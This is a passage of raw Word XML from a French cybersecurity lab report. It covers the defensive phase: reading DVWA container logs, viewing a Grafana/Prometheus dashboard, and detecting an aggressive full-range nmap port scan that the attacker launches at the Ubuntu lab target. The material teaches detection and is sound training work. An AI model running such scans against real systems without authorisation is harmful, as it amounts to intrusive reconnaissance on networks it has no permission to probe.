        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="316"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="008D1310" w14:paraId="7B65406D" w14:textId="77777777" w:rsidTr="008D1310">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65C96CF1" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IP_HOST_ONLY_ATTAQUANT = 192.168.44.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A95978E" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRPr="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707C6CBC" w14:textId="0270B661" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E09E84" w14:textId="2CD46724" w:rsidR="00A96198" w:rsidRPr="00B50FCE" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B859742" wp14:editId="6E338D98">
            <wp:extent cx="5962650" cy="1061085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="527721850" name="Image 52772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3213" cy="1061185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB2B35E" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B21FC4B" w14:textId="76657E7F" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>5. PHASE DÉFENSIVE ET SECOPS (BLUE TEAM) : SUPERVISION ET TRACES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D89E38" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Analyse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>forensic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> des Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3A7D13" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Du côté défenseur, toute attaque laisse des empreintes au sein du système de journalisation. Nous interrogeons les logs d'accès du conteneur sur le serveur Ubuntu cible :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="5B933DD9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="74DCF440" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> docker logs &lt;ID_CONTENEUR_DVWA&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C37A620" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB89EC0" w14:textId="120D1DA9" w:rsidR="00A96198" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008D1310">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39C6826B" wp14:editId="1CCAB879">
            <wp:extent cx="5943600" cy="1532255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2084158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8586" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1532255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3205928E" w14:textId="5763DF7A" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1310">
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD13C5C" wp14:editId="5642AFEC">
            <wp:extent cx="5943600" cy="511175"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="4366409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11175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE3477" w14:textId="351E9A5A" w:rsidR="008D1310" w:rsidRPr="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1310">
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72142F5B" wp14:editId="75EC476B">
            <wp:extent cx="5943600" cy="1512570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="986137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37117" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1512570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669AD56" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519E07BC" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09553ACE" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005AC06A" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Interfaçage de la Supervision </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>/Prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349463C5" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour surveiller l'infrastructure, la cible exécute un agent de collecte 'Node Exporter' couplé à une base de données de séries temporelles Prometheus et un afficheur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC45E6D" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Depuis l'attaquant, nous ouvrons la console </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la victime sur son port dédié :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA53BEA" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5040E6" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B951A4" w14:textId="77777777" w:rsidR="008D1310" w:rsidRPr="00DD5771" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w:rsidRPr="00DD5771" w14:paraId="4FF55600" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77674600" w14:textId="33F50347" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00EA3F4B" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD5771">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Http</w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="00DD5771">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>://&lt;IP_DE_LA_CIBLE_UBUNTU</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD5771">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>&gt; :</w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="00DD5771">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56D49842" w14:textId="77777777" w:rsidR="008D1310" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34E20AA6" wp14:editId="10436E14">
            <wp:extent cx="6199361" cy="1731617"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="18404264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71132" cy="1751664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F11C56" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9A76F8" w14:textId="152E0C5B" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nous sélectionnons le tableau de bord historique dédié (</w:t>
      </w:r>
      <w:r w:rsidR="00EA3F4B" w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ex :</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> modèle Node Exporter 1860). Si les données apparaissent vierges ('No Data'), l'ajustement du sélecteur d'instance en haut à gauche vers la nouvelle IP actuelle de la machine résout la liaison.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274D98F" w14:textId="2EAF611E" w:rsidR="00FA67FB" w:rsidRPr="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA67FB">
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64A67F77" wp14:editId="25B86960">
            <wp:extent cx="5943600" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="124379639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539240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2C05D" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3F026E" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>5.3 Corrélation Graphique d'un assaut de reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4D0683" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour valider les capacités de détection du SOC, l'attaquant initie un scan de ports extrêmement agressif destiné à saturer de requêtes les connexions réseaux de la cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E5D245" w14:textId="77777777" w:rsidR="00FA67FB" w:rsidRPr="00DD5771" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w:rsidRPr="00DD5771" w14:paraId="1AD80364" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="44FF8D2E" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD5771">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD5771">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p- -T4 &lt;IP_DE_LA_CIBLE_UBUNTU&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2657BB61" w14:textId="77777777" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C06D975" w14:textId="0EBC390E" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Simultanément, l'analyse graphique de la console </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirme la détection instantanée de l'anomalie réseau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4482E600" w14:textId="33DDB4B2" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CBE6ECE" wp14:editId="3357819F">
            <wp:extent cx="3380556" cy="1572205"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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2599" cy="1587107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C37A32" w14:textId="5B69E6D5" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
